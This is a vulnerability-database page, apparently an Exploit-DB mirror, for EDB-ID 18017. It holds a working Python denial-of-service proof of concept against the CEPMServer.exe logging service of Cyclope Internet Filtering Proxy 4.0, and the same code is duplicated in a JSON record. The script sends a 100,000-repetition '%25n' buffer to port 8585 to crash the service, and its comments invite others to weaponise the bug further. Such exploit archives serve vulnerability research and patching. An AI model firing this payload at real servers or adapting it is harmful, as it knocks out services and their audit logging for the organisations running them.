Search...

Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS Poc

2011-10-21T00:00:00

ID EDB-ID:18017
Type exploitdb
Reporter loneferret
Modified 2011-10-21T00:00:00

Description

Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc). Dos exploit for windows platform

                                        
                                            #!/usr/bin/python

# Title: Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc).
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Software link: http://www.cyclope-series.com/download/index.aspx?p=2
 
# Date Found: Oct 20th 2011
# Tested on: Windows XP SP3 Professional / Windows Server 2008 R2 Standard
# Tested with: Registered and Unregistered versions
# Nod to the Exploit-DB Team

# The Cyclope Internet Filtering Proxy is your basic white & black list website navigation filtering app.
# It will log all of the client's activities such as visited web sites, the time etc.
# There's an optional client application if the administrator wishes to acquire the computer name and user
# information.

# The CEPMServer service is what logs user and computer name when one uses the optional client application.
# This service is always on regardless of the client's use. So sending an abonormaly large string will cause a 
# crash. It doesn't stop the filtering but it does stop it from logging usernames and computer names.
# Seeing this application is pretty unstable, most often then not you need to re-install Cyclope completely
# to have the logging feature to work again.

# No registers are overwriten with this PoC, but it is possible to get ESI & EAX. Just throw SPIKE at it
# and you'll get those 2 registers. I was just too lazy this morning to investigate so...

# As always, if someone can make something more out of this PoC go right ahead.
# Have fun,
# loneferret


import struct
import socket

junk = "%25n" * 100000

buffer = "&lt;user&gt;loneferret" + junk + "&lt;/user&gt;&lt;computer&gt;machine&lt;/computer&gt;&lt;ip&gt;1.1.1.1&lt;/ip&gt;\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print "\nSending evil buffer..."
s.connect(('xxx.xxx.xxx.xxx',8585)) #Enter Cyclope server IP address
s.send(buffer)
s.close()

print "\nDone! "

JSON Vulners Source

Initial Source

{"published": "2011-10-21T00:00:00", "id": "EDB-ID:18017", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"vulnersScore": 5.0}, "hash": "cc811e8d51ccae57097611dadaaa6de55e4631b58e6d90e199a3169e40481036", "description": "Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc). Dos exploit for windows platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/18017/", "lastseen": "2016-02-02T09:01:09", "edition": 1, "title": "Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS Poc", "osvdbidlist": ["76667"], "modified": "2011-10-21T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://www.exploit-db.com/download/18017/", "references": [], "reporter": "loneferret", "sourceData": "#!/usr/bin/python\r\n\r\n# Title: Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc).\r\n# From: The eh?-Team || The Great White Fuzz (we're not sure yet)\r\n# Found by: loneferret\r\n# Software link: http://www.cyclope-series.com/download/index.aspx?p=2\r\n \r\n# Date Found: Oct 20th 2011\r\n# Tested on: Windows XP SP3 Professional / Windows Server 2008 R2 Standard\r\n# Tested with: Registered and Unregistered versions\r\n# Nod to the Exploit-DB Team\r\n\r\n# The Cyclope Internet Filtering Proxy is your basic white & black list website navigation filtering app.\r\n# It will log all of the client's activities such as visited web sites, the time etc.\r\n# There's an optional client application if the administrator wishes to acquire the computer name and user\r\n# information.\r\n\r\n# The CEPMServer service is what logs user and computer name when one uses the optional client application.\r\n# This service is always on regardless of the client's use. So sending an abonormaly large string will cause a \r\n# crash. It doesn't stop the filtering but it does stop it from logging usernames and computer names.\r\n# Seeing this application is pretty unstable, most often then not you need to re-install Cyclope completely\r\n# to have the logging feature to work again.\r\n\r\n# No registers are overwriten with this PoC, but it is possible to get ESI & EAX. Just throw SPIKE at it\r\n# and you'll get those 2 registers. I was just too lazy this morning to investigate so...\r\n\r\n# As always, if someone can make something more out of this PoC go right ahead.\r\n# Have fun,\r\n# loneferret\r\n\r\n\r\nimport struct\r\nimport socket\r\n\r\njunk = \"%25n\" * 100000\r\n\r\nbuffer = \"<user>loneferret\" + junk + \"</user><computer>machine</computer><ip>1.1.1.1</ip>\\n\"\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\nprint \"\\nSending evil buffer...\"\r\ns.connect(('xxx.xxx.xxx.xxx',8585)) #Enter Cyclope server IP address\r\ns.send(buffer)\r\ns.close()\r\n\r\nprint \"\\nDone! \"\r\n", "objectVersion": "1.0"}